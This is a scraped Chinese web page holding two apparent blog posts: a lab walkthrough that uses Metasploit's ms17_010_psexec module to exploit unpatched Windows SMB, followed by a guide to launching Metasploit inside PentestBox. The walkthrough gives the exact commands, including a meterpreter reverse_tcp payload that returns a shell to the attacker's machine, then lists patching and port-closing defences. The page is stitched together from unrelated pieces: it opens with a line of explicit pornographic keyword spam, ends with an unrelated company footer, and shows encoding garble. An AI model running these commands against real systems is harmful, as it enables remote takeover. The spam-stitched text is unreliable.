操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    2017年4月,黑客界最為轟動的事件無疑是TheShadowBrokers(影子經(jīng)紀(jì)人)放出的美國國家安全局(NSA)使用的黑客工具包,里邊最出名、最有破壞力的當(dāng)屬EternalBlue(永恒之藍(lán))。一夜之間,全世界百分之七十的windows服務(wù)器置于永恒之藍(lán)的威脅之中,各種像“哭泣吧”等勒索病毒也因此大規(guī)模爆發(fā)。在此之前,黑客工具包中的EternalSynergy永恒協(xié)作、EternalRomance永恒浪漫、EternalChampion永恒冠軍也曾被用于網(wǎng)絡(luò)攻擊,但是它們并沒有和 EternalBlue 一樣被大規(guī)模應(yīng)用,因?yàn)樗鼈儫o法在最新的Windows版本上使用。

    2018年的2月2 號,安全研究人員(@ zerosum0x0)改變了這一事實(shí),成功寫出了這幾個(gè)漏洞的綜合利用工具,并給出了metasploit的利用模塊ms17_010_command和ms17_010_psexec。我在本機(jī)測試了一下,令人驚嘆的好用,我的測試流程說明如下。

    我去下載了最新windows版的metasploit,下載地址我會在評論里給出。我本機(jī)的ip是192.168.1.100,虛擬機(jī)的ip是192.168.1.101。

    一、win10下本機(jī)裝好metasploit,輸入msfconsole啟動

    依次輸入以下命令:

    use exploit/windows/smb/ms17_010_psexec

    set rhost 192.168.1.101

    set payload windows/meterpreter/reverse_tcp

    set lhost 192.168.1.100

    上邊的四句命令我解釋一下,第一句調(diào)用zerosum0x0寫的ms17_010_psexec模塊,第二句指明攻擊的IP是192.168.1.101。第三句指明我要本機(jī)開啟meterpreter反向監(jiān)聽模塊,監(jiān)聽本機(jī)的IP地址是192.168.1.100。

    二、輸入exploit攻擊,自動返回meterpreter會話

    我們只需要輸入以上四條命令就可以了,再接著輸入exploit就可以進(jìn)行自動攻擊了,幾乎是瞬間返回了反彈的meterpreter的shell。

    三、勒索病毒是否會卷土重來?

    zerosum0x0寫的模塊幾乎是無bug的。他也發(fā)了份此地?zé)o銀三百兩的聲明:這個(gè)軟件純粹是為了學(xué)術(shù)研究和開發(fā)有效的防御技術(shù)的目的而創(chuàng)建的,除非明確授權(quán),否則不打算用于攻擊系統(tǒng)。 作者和項(xiàng)目維護(hù)者不對軟件的濫用負(fù)責(zé)。

    我以前也試過一些永恒之藍(lán)的漏洞利用工具,幾乎大部分工具都容易造成對方的藍(lán)屏或死機(jī),攻擊版本也受限制,而zerosum0x0的不會,并且支持從Windows 2000到2016。在短短幾天的時(shí)間里,這兩個(gè)模塊已經(jīng)成為Metasploit最受歡迎的兩個(gè)測試模塊。

    勒索病毒是否會利用這一工具,即將卷土重來也未可知。

    四、我們?nèi)绾畏烙?/strong>

    1.升級到微軟提供支持的Windows版本,并安裝補(bǔ)丁。

    2.安裝相關(guān)的防護(hù)措施,如緩沖區(qū)溢出防御軟件、殺毒軟件。

    3.無補(bǔ)丁的Windows版本,臨時(shí)關(guān)閉135、137、445端口和3389遠(yuǎn)程登錄。

    原本想愚人節(jié)發(fā)的,后來一想,這么不正經(jīng)的節(jié)日,這么能出教程呢,于是乎我今天發(fā)。(拖更找什么借口)

    最近有小伙伴問我,msf在pentest box中遇到的無法啟動,報(bào)錯(cuò)的問題,為此寫一篇問題解決方法。望各位小伙伴采納。

    報(bào)錯(cuò)表現(xiàn)

    這個(gè)報(bào)錯(cuò)是DL 插件版本與其他版本插件不匹配,導(dǎo)致啟動報(bào)錯(cuò),解決方法,可參考,https://www.baidu.com/link?url=9trAvx_0GRfNoOmBUuFjMP6c5hUEXL-jxFEFjas_ezWJPjPmNRkF2PF36zdkMurMbatqjBm3qi0T89uJPGmsZq&wd=&eqid=b0f0355f000454cf000000055ca1a8cc

    其他版本類型的報(bào)錯(cuò)都可以解決。就是會很麻煩。

    文件介紹

    上面的太難,看不懂,不用怕,有一個(gè)極其傻瓜化的方法可以解決msf啟動報(bào)錯(cuò),先認(rèn)識一下box的文件路徑。

    從上到下依次為。

    1. 插件

    2. 主文件

    3. TAB補(bǔ)齊(剛安裝的box,沒有這個(gè)文件夾)

    4. 文件配置

    5. 圖標(biāo)

    6. box運(yùn)行框架

    7. dll,(新的box只要需要用的,其他請無視)

    bin文件夾路徑介紹

    從上到下依次為

    1. 7za---解壓縮

    2. wifi破解(目前有各種報(bào)錯(cuò),感興趣可以自己折騰折騰)

    3. 安卓逆向攻擊

    4. 一種編譯器,看起來挺好的。

    5. 網(wǎng)絡(luò)釣魚

    6. 網(wǎng)絡(luò)抓包發(fā)包工具。

    7. 網(wǎng)絡(luò)抓包發(fā)包工具(破解版)

    8. init設(shè)置文件夾

    9. 自定義文件(等下會用到)

    10. exp執(zhí)行工具

    11. Firefox超好用的瀏覽器(還有各種黑客工具)

    12.網(wǎng)絡(luò)取證工具

    13. 信息收集工具

    14. NMAP (不用介紹了吧)

    15. notpad++(用過的人都說好,vim聽了想打人)

    16. 密碼破解攻擊

    17. 逆向工具

    18. 腳本設(shè)置文件夾

    19. 嗅探工具(可以自行下載dll,調(diào)試使用)

    20.數(shù)據(jù)庫軟件

    21. 壓力測試

    22. web掃描

    23. wget (大家都知道的吧)

    24. 超好用的網(wǎng)絡(luò)分析軟件

    解決方法

    說了這么多廢話,下面介紹我的解決方法,在上一篇文章當(dāng)中,介紹到pentest box 可以將外置神器復(fù)制到pentest box 環(huán)境中,我們也可以將msf放到pentest box環(huán)境中,首先咱們需要一個(gè)不帶msf的pentest box,如果有小伙伴下載了有msf版本的,可以將msf文件所在的文件夾刪除。

    首先需要以下幾個(gè)工具

    1. pentest box(剛裝好的最好)

    2. msf5.0最新版,官網(wǎng)Windows版本可以下載

    安裝msf(win版),因?yàn)槠涮厥剐再|(zhì),導(dǎo)致它只能被安裝在硬盤上,可以在安裝好了過后,再移動到pentest box文件夾中,移動的地址為。進(jìn)入bin文件夾,再進(jìn)入customtools文件夾,也可換做其他文件夾,但要記得移動路徑。

    win版的msf于其他版本不同,啟動的方法為首先進(jìn)入msf的文件夾內(nèi)

    再進(jìn)入bin文件夾內(nèi)。

    在這里看,就會看到一個(gè)msfconsole.bat的批處理,雙擊即可運(yùn)行msf。

    簡單化

    那么要是每次啟動都找文件夾雙擊的話,豈不是很麻煩。下面就介紹傻瓜化的方法。

    G:\pentest\bin\customtools\metasploit-framework

    將msf的文件夾,記住一定是文件夾,不是單個(gè)文件。參照上面的路徑設(shè)置,因?yàn)槲业氖莡盤顯示的路徑是G,大家請根據(jù)自身情況設(shè)置,但要注意,“G:”后面的文件路徑建議和我一樣。

    移動好了過后,在這個(gè)文件夾里找,名叫customaliases的文件

    使用記事本或者其他文本閱讀器打開,有搜索功能的最好。

    打開文件后像這個(gè)樣子

    會看到路徑,因?yàn)槲沂亲约喊惭b的所以會比較多,剛安裝的box就幾行

    在這個(gè)文件里寫入。

    msfconsole= "%pentestbox_ROOT%\bin\customtools\metasploit-framework\bin\msfconsole.bat" $*

    路徑自己設(shè)置的按照自己的路徑,如果是按照的我路徑寫入,保存即可。

    若不知道為何這樣子設(shè)置,請看pentest box 介紹

    結(jié)果

    重新打開box,輸入msfconsole,就可以啟動msf了,瞧,今天愚人節(jié),字符畫也是一個(gè)彩蛋哦。大家還可以自定義自己喜歡的工具哦。

    本文作者:@A1d2m3i4n5

    小編碼字不易,給個(gè)關(guān)注再走吧。嚶嚶嚶(╥╯^╰╥)

網(wǎng)站首頁   |    關(guān)于我們   |    公司新聞   |    產(chǎn)品方案   |    用戶案例   |    售后服務(wù)   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區(qū)    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權(quán)所有